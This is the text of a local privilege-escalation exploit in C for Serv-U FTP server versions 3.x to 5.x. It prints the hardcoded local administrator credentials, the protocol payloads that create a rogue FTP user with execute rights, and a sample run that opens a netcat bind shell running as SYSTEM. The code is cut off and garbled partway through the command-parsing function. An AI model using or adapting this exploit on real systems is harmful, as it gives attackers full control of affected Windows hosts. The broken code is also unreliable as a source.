|
Serv-U 3.x - 4.x - 5.x local privileges escalation SYSTEM Exploit
|
/*
* Hax0rcitos proudly presents
* Serv-u Local Exploit >v3.x. (tested also against last version 5.1.0.0)
*
* All Serv-u Versions have default Login/password for local Administration.
* This account is only available to connect in the loopback interface, so a
* local user will be able to connect to Serv-u with this account and create
* an ftp user with execute rights. after the user is created, just connect
* to the ftp server and execute a raw "SITE EXEC" command. the program will
* be execute with SYSTEM privileges.
*
* Copyright (c) 2003-2004 Haxorcitos com . All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*
* Date: 10/2003
* Author: Andrés Tarascó Acunha
*
* Greetings to: #haxorcitos - #localhost and #!dsr blackxors =)
*
* Tested Against Serv-u 4.x and v5.1.0.0
G:\exploit\serv-U\local>whoami
INSANE\aT4r
G:\exploit\serv-U\local>servulocal.exe "nc -l -p 99 -e cmd.exe"
Serv-u >3.x Local Exploit by Haxorcitos
USER LocalAdministrator
PASS #l@$ak#.lk;0@P
SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
USER haxorcitos
PASS whitex0r
nc localhost 99
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>whoami
whoami
NT AUTHORITY\SYSTEM
C:\>
*/
#include
#include
#include
#include
#include
//Responses
#define BANNER "220 "
#define USEROK "331 User name okay"
#define PASSOK "230 User logged in, proceed."
#define ADMOK "230-Switching to SYSTEM MAINTENANCE mode."
#define DOMAINID "200-DomainID="
//Commands
#define XPLUSER "USER haxorcitos\r\n"
#define XPLPASSWORD "PASS whitex0r\r\n"
#define USER "USER LocalAdministrator\r\n"
#define PASSWORD "PASS #l@$ak#.lk;\r\n"
#define MAINTENANCE "SITE MAINTENANCE\r\n"
#define EXIT "QUIT\r\n"
char newdomain[]="-SETDOMAIN\r\n"
"-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n"
"-TZOEnable=0\r\n"
" TZOKey=\r\n";
/* "-DynDNSEnable=0\r\n"
" DynIPName=\r\n";
*/
char deldomain[]="-DELETEDOMAIN\r\n"
"-IP=0.0.0.0\r\n"
" PortNo=2121\r\n";
char newuser[] =
"-SETUSERSETUP\r\n"
"-IP=0.0.0.0\r\n"
"-PortNo=2121\r\n"
"-User=haxorcitos\r\n"
"-Password=whitex0r\r\n"
"-HomeDir=c:\\\r\n"
"-LoginMesFile=\r\n"
"-Disable=0\r\n"
"-RelPaths=1\r\n"
"-NeedSecure=0\r\n"
"-HideHidden=0\r\n"
"-AlwaysAllowLogin=0\r\n"
"-ChangePassword=0\r\n"
"-QuotaEnable=0\r\n"
"-MaxUsersLoginPerIP=-1\r\n"
"-SpeedLimitUp=0\r\n"
"-SpeedLimitDown=0\r\n"
"-MaxNrUsers=-1\r\n"
"-IdleTimeOut=600\r\n"
"-SessionTimeOut=-1\r\n"
"-Expire=0\r\n"
"-RatioUp=1\r\n"
"-RatioDown=1\r\n"
"-RatiosCredit=0\r\n"
"-QuotaCurrent=0\r\n"
"-QuotaMaximum=0\r\n"
"-Maintenance=None\r\n"
"-PasswordType=Regular\r\n"
"-Ratios=None\r\n"
" Access=c:\\|RELP\r\n";
#define localport 43958
#define localip "127.0.0.1"
char cadena[1024];
int rec,domain;
/******************************************************************************/
void ParseCommands(int sock, char *data, int ShowSend, int showResponses,
char *response) {
send(sock,data,strlen(data),0);
if (ShowSend) printf(">%s",data);
Sleep(100);
do {
rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0';
if (rec3.x Local Exploit by Haxorcitos\r\n\r\n");
if (argc
|
